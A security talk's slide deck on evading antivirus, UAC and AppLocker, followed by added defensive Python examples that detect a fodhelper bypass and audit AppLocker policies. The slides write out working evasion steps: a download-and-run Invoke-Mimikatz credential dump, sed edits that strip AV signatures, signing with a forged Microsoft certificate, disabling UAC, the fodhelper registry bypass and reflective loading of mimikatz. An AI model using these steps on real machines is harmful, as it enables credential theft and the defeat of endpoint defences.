Endpoint protection
is not enough.
By Sumedt Jitpukdebodin

Senior Security Researcher @ I-SECURE
How Antivirus works
• Signature-based: matches known byte patterns, strings or file hashes (cheapest to evade: change the bytes)

• Heuristic-based: static rules and behaviour monitoring (packers, RWX allocations, suspicious API use)

• Cloud-based: reputation lookups on hashes, signers and how widely a file is seen
Malware Statistics
• Chart: distribution of malware under Windows in 2016

• Chart: top 10 file extensions of malware, Q1 2017
Evasion Techniques
• Anti-security techniques (Avoid detection)

• Anti-sandbox techniques (Avoid automatic analysis)

• Anti-analyst techniques (Avoid analysis)
Anti-security techniques
• Obfuscation (rename identifiers, strip comments, encode strings so signatures no longer match)

• Crypter (encrypts the payload and decrypts it at run time)

• Packer (compresses or wraps the executable so the bytes on disk differ from the code that runs)

• FUD (Fully UnDetectable by antimalware, at the moment of testing)

• etc.
Frameworks that generate AV-bypassing payloads
• Veil

• TheFatRat

• Winpayloads

• Dr0p1t-Framework

• Avet

• VBad

• Obfuscated Empire

• OWASP-ZSC

• etc
Invoke-Mimikatz
• powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

The script is pulled straight into memory and never written to disk, yet AV still catches it: the detection keys on well-known strings inside the script text (function name, parameter names, comments), which is exactly what the next slide strips.
Just a Mimikatz
Rename or strip the strings that signatures key on (the recipe from the Black Hills Infosec post in Resource); every sed edits Invoke-Mimikatz.ps1 in place, so run them in this order:

• sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1   (rename the function itself)

• sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1   (drop the <# ... #> help block, which names Mimikatz)

• sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1   (blank every # comment line)

• sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1   (the -DumpCreds switch becomes -DumpCred)

• sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1

• sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1   (rename two variables that signatures matched on)

• sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #-/g" Invoke-Mimikatz.ps1   (append a harmless trailing comment to lines ending in -Win32Functions $Win32Functions so their bytes change; the \$ keeps the shell from expanding the variable inside double quotes)
Just a Mimikatz(2)
• powershell -exec bypass

• Import-Module Invoke-Mimikatz.ps1

• Invoke-Mimidogz
Sign malware with fake certificate
• osslsigncode verify <microsoft exe>   (look at how a genuine Microsoft binary is signed: subject, OU, validity period)

• openssl req -x509 -newkey rsa:4096 -keyout fake_microsoft_key.pem -out fake_microsoft_cert.pem -days 365 -subj "/C=US/ST=Washington/L=Redmond/O=Microsoft Corporation/OU=MOPR/CN=Microsoft Corporation"   (a self-signed certificate whose subject copies Microsoft's; add -nodes if you do not want a passphrase on the key)

• osslsigncode sign -in evil.exe -key fake_microsoft_key.pem -certs fake_microsoft_cert.pem -out evil_signed.exe

The signature is cryptographically valid, but the chain ends in a self-signed root that Windows does not trust, so Authenticode validation (signtool verify, Get-AuthenticodeSignature) still fails. What it defeats is a human glancing at the file properties, and products that score "signed" or the publisher name without validating the chain.
But getting an EXE to run is hard...
so try indirect ways
• Macro

• vbs

• DLL

• hta (HTML Application)

• PS1

• etc.
Example of HTA with VBScript
Show time
Show time (2)
UAC
• User Account Control (UAC): processes run with standard user rights instead of full administrator rights until the user consents to elevation

• Turn UAC off (needs an elevated shell; takes effect after a reboot):
  C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

• Turn it back on:
  C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
Bypass UAC
• Abuse a mistake in any autoElevate binary (check the autoElevate flag in the manifest with sigcheck -m)

• UACME (collection of known bypasses)

• DLL hijacking of an auto-elevated process

• autoElevate binaries that take attacker-controlled input

• Elevated COM interfaces

• SDCLT (the Backup command)

• Fodhelper (Manage Optional Features)

• Process or DLL injection into a process signed with the Windows publisher certificate

• Windows Update Standalone Installer (wusa.exe), whose elevated /extract could drop files into protected directories (the switch has since been removed from Windows 10)

• etc.
Bypass UAC with Fodhelper
• fodhelper.exe (%WINDIR%\System32\fodhelper.exe) is auto-elevating: at the default UAC level it starts at high integrity without a prompt, and it opens the ms-settings: URI

• The handler lookup goes through HKCU\Software\Classes first, where the key is missing by default, so a standard user can create it:

• HKCU:\Software\Classes\ms-settings\shell\open\command

• HKCU:\Software\Classes\ms-settings\shell\open\command\DelegateExecute   (create it and leave it empty, so the shell falls back to the command below instead of the COM handler)

• HKCU:\Software\Classes\ms-settings\shell\open\command\(default)   (the command to run; starting fodhelper.exe then runs it elevated; delete the key afterwards)
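The defender's side of the UAC slide (EnableLUA set to 0) and of this Fodhelper slide, as an added example that is not part of the talk: detection logic run over a constructed stream of Sysmon-style events. Field names follow Sysmon's process-create (EventID 1) and registry (EventID 12/13) events, in which HKCU shows up as HKU followed by the user's SID; the events, the SID and the user name are made up for the example.

```python
"""Added example: detect the fodhelper handler hijack and UAC being switched off,
over constructed Sysmon-style events (EventID 1 process create, 12/13 registry).
Events, SID and user name are made up; field names follow Sysmon."""
import ntpath

# Auto-elevating binaries named on the slides, and shells none of them should ever spawn.
AUTO_ELEVATE = {"fodhelper.exe", "sdclt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# fodhelper resolves the ms-settings handler through HKCU\Software\Classes first; the key does
# not exist there by default, so any write to it from a user context is suspicious.
HANDLER_KEY = r"\software\classes\ms-settings\shell\open\command"
ENABLELUA = r"\software\microsoft\windows\currentversion\policies\system\enablelua"


def detect(events):
    """One alert dict per rule hit, each carrying the index of the triggering event."""
    alerts = []
    handler_writers = set()   # users already seen writing the ms-settings handler key
    for i, ev in enumerate(events):
        user = ev.get("User", "")
        if ev["EventID"] in (12, 13):
            target = ev["TargetObject"].lower()
            if target.startswith("hku\\") and HANDLER_KEY in target:
                alerts.append({"rule": "ms_settings_handler_write", "event": i, "user": user})
                handler_writers.add(user)
            elif ev["EventID"] == 13 and target.endswith(ENABLELUA) and ev.get("Details") == "DWORD (0x00000000)":
                # the reg.exe ... /v EnableLUA /d 0 command from the UAC slide: UAC off after next reboot
                alerts.append({"rule": "uac_disabled_enablelua", "event": i, "user": user})
        elif ev["EventID"] == 1:
            parent = ntpath.basename(ev.get("ParentImage", "")).lower()
            child = ntpath.basename(ev["Image"]).lower()
            if parent in AUTO_ELEVATE and child in SHELLS and ev.get("IntegrityLevel") == "High":
                alerts.append({"rule": "autoelevate_spawned_shell", "event": i, "user": user})
                if user in handler_writers:   # same user planted the handler earlier: the whole chain
                    alerts.append({"rule": "uac_bypass_fodhelper_correlated", "event": i, "user": user})
    return alerts


# Constructed sample stream: a Medium-integrity PowerShell plants the handler, launches
# fodhelper.exe, gets a High-integrity cmd.exe, then switches UAC off; one benign HKCU write.
U = "LAB\\alice"
SID = r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe", "IntegrityLevel": "Medium", "User": U},
    {"EventID": 13, "Image": PS, "User": U, "Details": "(Empty)",
     "TargetObject": SID + r"\Software\Classes\ms-settings\Shell\Open\command\DelegateExecute"},
    {"EventID": 13, "Image": PS, "User": U, "Details": r"C:\Windows\System32\cmd.exe /c whoami",
     "TargetObject": SID + r"\Software\Classes\ms-settings\Shell\Open\command\(Default)"},
    {"EventID": 1, "Image": r"C:\Windows\System32\fodhelper.exe", "ParentImage": PS, "IntegrityLevel": "High", "User": U},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\fodhelper.exe",
     "IntegrityLevel": "High", "User": U},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe", "User": U, "Details": "DWORD (0x00000000)",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA"},
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe", "User": U, "Details": "DWORD (0x00000001)",
     "TargetObject": SID + r"\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"event {a['event']}: {a['rule']} ({a['user']})")
```

The registry rule alone is enough to catch the preparation step, because nothing legitimate writes that key under HKCU; the process rule catches the payoff even if the attacker used a different handler trick; the correlated alert ties the two together for the same user. Sysmon only logs these if its configuration includes the ms-settings and Policies\System targets, so check the configuration before trusting the absence of alerts.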
Show time (3)
AppLocker
• Application whitelisting built into Windows

• Controls executable files, scripts, Windows Installer files, dynamic-link libraries (DLLs), packaged apps and packaged app installers

• Windows 7 and later (enforcement only on Enterprise/Ultimate/Education editions)

• Configured per machine (secpol.msc) or by Group Policy (gpmc.msc)
AppLocker File Type
• Executables: regular .exe and .com applications (cmd.exe, ipconfig.exe, etc.)

• Windows Installer files (.msi, .msp, .mst), typically used to install new software on the machine

• Script files with the extensions .ps1, .bat, .cmd, .vbs and .js

• Packaged apps installed through the Microsoft Store

• DLL files (.dll and .ocx; the DLL collection is off by default and lives under the advanced tab)
AppLocker Rule
• Execution Path

• Publisher Information

• File Hash
Bypass AppLocker
• Find a user-writable directory under a path the rules allow (the default rules allow everything under %WINDIR%):

• "C:\Windows\Tasks"

• "C:\Windows\tracing"

• Load the PE from memory instead of from disk (PowerSploit's Invoke-ReflectivePEInjection; AppLocker checks the file being started, and powershell.exe itself is allowed):

• $ByteArray = [System.IO.File]::ReadAllBytes("C:\users\richard\desktop\mimikatz.exe")

• Invoke-Expression (Get-Content .\Invoke-ReflectivePEInjection.ps1 | Out-String)

• Invoke-ReflectivePEInjection -PEBytes $ByteArray

• Modify or recompile the exe so its hash changes (defeats hash rules only; path and publisher rules are unaffected)

• PowerShell without powershell.exe (Casey Smith; also in PowerShell Empire): host the PowerShell engine from another allowed binary

• Registry key manipulation

• Run the PE through a signed Microsoft binary that the default rules allow:

• C:\Windows\System32\rundll32.exe

• C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe (installs and uninstalls applications from the command prompt; runs the uninstaller code of whatever assembly it is pointed at)

• C:\Windows\System32\regsvr32.exe (registers and unregisters DLLs)

• C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (builds projects where Visual Studio is not installed; executes inline tasks from a project file)
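An added example that is not part of the talk: a check of an exported AppLocker policy for the gaps this slide exploits. The policy XML is constructed (rule names mirror the default rules, the GUIDs are placeholders); the writable directories are the two named above, the LOLBin paths are the four named above, and the path-variable expansion assumes a default install on C:.

```python
"""Added example: audit an exported AppLocker policy for user-writable folders under
Allow rules, allowed LOLBins with no Deny rule, and collections that do not enforce.
The policy below is constructed; the GUIDs are placeholders."""
import re
import ntpath
import xml.etree.ElementTree as ET

# AppLocker path variables as they appear in exported rules, expanded for a default install.
ENV = {"%WINDIR%": r"C:\Windows", "%SYSTEM32%": r"C:\Windows\System32",
       "%PROGRAMFILES%": r"C:\Program Files", "%OSDRIVE%": "C:"}
WRITABLE_DIRS = [r"C:\Windows\Tasks", r"C:\Windows\tracing"]                     # from the slide
LOLBINS = [r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\regsvr32.exe",
           r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe",
           r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"]           # from the slide
ADMINS_SID = "S-1-5-32-544"   # rules scoped to local Administrators do not help a standard user


def expand(path: str) -> str:
    """Replace AppLocker path variables (case-insensitive) with concrete paths."""
    for var, value in ENV.items():
        path = re.sub(re.escape(var), lambda _m: value, path, flags=re.IGNORECASE)
    return path


def covers(rule_path: str, target: str, is_dir: bool = False) -> bool:
    """Does a path condition (exact file, or a folder ending in '*') cover target?"""
    pattern = expand(rule_path).lower()
    t = target.lower() + ("\\" if is_dir else "")
    if pattern == "*":
        return True
    if pattern.endswith("*"):
        return t.startswith(pattern[:-1])   # everything below the folder
    return t == pattern


def allowing_rules(target, allows, denies, is_dir=False):
    """Names of Allow rules covering target, unless one of their exceptions or a Deny covers it."""
    if any(covers(d, target, is_dir) for d in denies):
        return []
    return [name for name, paths, excs in allows
            if any(covers(p, target, is_dir) for p in paths)
            and not any(covers(e, target, is_dir) for e in excs)]


def audit(policy_xml: str) -> list:
    """(finding, detail) pairs for the whole policy."""
    findings = []
    for coll in ET.fromstring(policy_xml).findall("RuleCollection"):
        ctype, mode = coll.get("Type"), coll.get("EnforcementMode", "NotConfigured")
        if mode != "Enabled":
            findings.append(("collection_not_enforced", f"{ctype}: {mode}"))
            continue
        allows, denies = [], []
        for rule in coll.findall("FilePathRule"):
            if rule.get("UserOrGroupSid") == ADMINS_SID:
                continue
            paths = [c.get("Path") for c in rule.findall("Conditions/FilePathCondition")]
            excs = [c.get("Path") for c in rule.findall("Exceptions/FilePathCondition")]
            if rule.get("Action") == "Allow":
                allows.append((rule.get("Name"), paths, excs))
            else:
                denies.extend(paths)
        for d in WRITABLE_DIRS:
            for name in allowing_rules(d, allows, denies, is_dir=True):
                findings.append(("writable_dir_allowed", f"{ctype}: '{name}' allows {d}"))
        if ctype == "Exe":
            for b in LOLBINS:
                if allowing_rules(b, allows, denies):
                    findings.append(("lolbin_allowed", f"Exe: {ntpath.basename(b)} ({b})"))
    return findings


# Constructed policy: the three default Exe rules, an exception for Tasks only, a Deny for
# MSBuild only, scripts in audit mode and the DLL collection never configured.
SAMPLE_POLICY = r"""<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="Enabled">
    <FilePathRule Id="00000000-0000-0000-0000-000000000001" Name="(Default Rule) All files located in the Program Files folder" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%PROGRAMFILES%\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="00000000-0000-0000-0000-000000000002" Name="(Default Rule) All files located in the Windows folder" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%WINDIR%\*" /></Conditions>
      <Exceptions><FilePathCondition Path="%WINDIR%\Tasks\*" /></Exceptions>
    </FilePathRule>
    <FilePathRule Id="00000000-0000-0000-0000-000000000003" Name="(Default Rule) All files" UserOrGroupSid="S-1-5-32-544" Action="Allow">
      <Conditions><FilePathCondition Path="*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="00000000-0000-0000-0000-000000000004" Name="Block MSBuild for everyone" UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions><FilePathCondition Path="%WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" /></Conditions>
    </FilePathRule>
  </RuleCollection>
  <RuleCollection Type="Script" EnforcementMode="AuditOnly" />
  <RuleCollection Type="Dll" EnforcementMode="NotConfigured" />
</AppLockerPolicy>"""

if __name__ == "__main__":
    for kind, detail in audit(SAMPLE_POLICY):
        print(f"{kind}: {detail}")
```

On the sample policy the audit reports tracing (Tasks is covered by the exception), rundll32, regsvr32 and InstallUtil (only MSBuild has a Deny), and the two collections that never block anything. Two caveats: a real deny list also needs the Framework64 copies of the .NET binaries, and denying rundll32 or regsvr32 outright breaks legitimate software, so test the Deny rules in audit mode first.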
Show time (4)
Protecting against malware
• People: security awareness training

• Process: restrict what can be installed or run by policy, patching, backups, governance, threat intelligence, an incident response plan, and more => a security team that owns them

• Technology: technology supports the team and the processes; it does not replace them

• Backup

• Antivirus

• Anti-ransomware

• Endpoint Detection and Response
Q & A
Resource
• https://www.blackhillsinfosec.com/?p=5555

• https://github.com/nccgroup/Winpayloads

• https://www.youtube.com/watch?v=6bUoz5ChTOs

• https://github.com/D4Vinci/Dr0p1t-Framework

• https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf

• https://www.av-test.org/fileadmin/pdf/security_report/AV-TEST_Security_Report_2016-2017.pdf

• https://github.com/Pepitoh/VBad

• https://stackoverflow.com/questions/18287960/signing-windows-application-on-linux-based-distros

• https://twitter.com/Andrew___Morris/status/879712530041626627

• https://github.com/cobbr/ObfuscatedEmpire

• https://pentestlab.blog/tag/uac/

• https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/

• https://www.greyhathacker.net/?p=796

• https://pen-testing.sans.org/resources/papers/gpen/windows-script-host-hack-windows-120189

• https://www.slideshare.net/ThomasRoccia/malware-evasion-techniques

• https://www.slideshare.net/CTruncer/the-supporting-role-of-antivirus-evasion-while-persisting

• https://github.com/api0cradle/UltimateAppLockerByPassList

Antivirus is hopeless
